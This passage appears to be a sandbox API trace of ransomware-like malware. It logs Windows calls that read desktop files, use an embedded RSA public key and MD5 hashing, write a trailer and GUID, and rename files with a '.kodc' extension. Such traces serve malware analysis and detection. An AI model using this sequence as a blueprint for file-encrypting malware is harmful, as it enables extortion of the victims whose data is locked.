(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9 Vm_5e64ZEi3JJc07u7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9 vm_5e64zei3jjc07u7.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.629] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=30638) returned 1 [0097.629] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.632] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7788, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.632] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.634] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.634] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.634] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x77ae, lpOverlapped=0x0) returned 1 [0097.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.634] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.634] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.635] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.635] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.635] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.635] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.635] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.635] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.635] GetLastError () returned 0x0 [0097.636] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.636] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.636] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.636] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.636] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x77b0) returned 0x9ba4d90 [0097.636] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.636] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fa80 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fac8 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.636] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.637] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a640 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a628 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.637] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a640 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.637] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.638] GetCurrentThreadId () returned 0x42c [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695d08 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.638] GetCurrentThreadId () returned 0x42c [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.638] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.638] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.639] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.639] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a658 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a520 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a628 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.640] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.640] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.641] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x77ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.641] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.641] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.641] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.641] CloseHandle (hObject=0x5cc) returned 1 [0097.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.642] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x32d0db8 [0097.642] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9 Vm_5e64ZEi3JJc07u7.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9 vm_5e64zei3jjc07u7.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9 Vm_5e64ZEi3JJc07u7.flv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9 vm_5e64zei3jjc07u7.flv.kodc")) returned 1 [0097.644] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xddd89a90, ftCreationTime.dwHighDateTime=0x1d5c3d8, ftLastAccessTime.dwLowDateTime=0xe6905a00, ftLastAccessTime.dwHighDateTime=0x1d5c00f, ftLastWriteTime.dwLowDateTime=0xe6905a00, ftLastWriteTime.dwHighDateTime=0x1d5c00f, nFileSizeHigh=0x0, nFileSizeLow=0x146cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="B1thbOPkcKcfqX.ppt", cAlternateFileName="B1THBO~1.PPT")) returned 1 [0097.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.644] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.644] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B1thbOPkcKcfqX.ppt") returned=".ppt" [0097.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\B1thbOPkcKcfqX.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\b1thbopkckcfqx.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.644] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=83663) returned 1 [0097.644] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.648] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x146a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.648] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.649] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x146cf, lpOverlapped=0x0) returned 1 [0097.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.649] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.649] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.649] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.650] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.650] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.650] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.650] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.650] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.650] GetLastError () returned 0x0 [0097.650] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.651] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.651] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.651] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.651] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.651] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.651] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x146d0) returned 0x9ba4d90 [0097.651] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.652] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.652] RtlAllocateHeap (HeapHandle=0x630000, 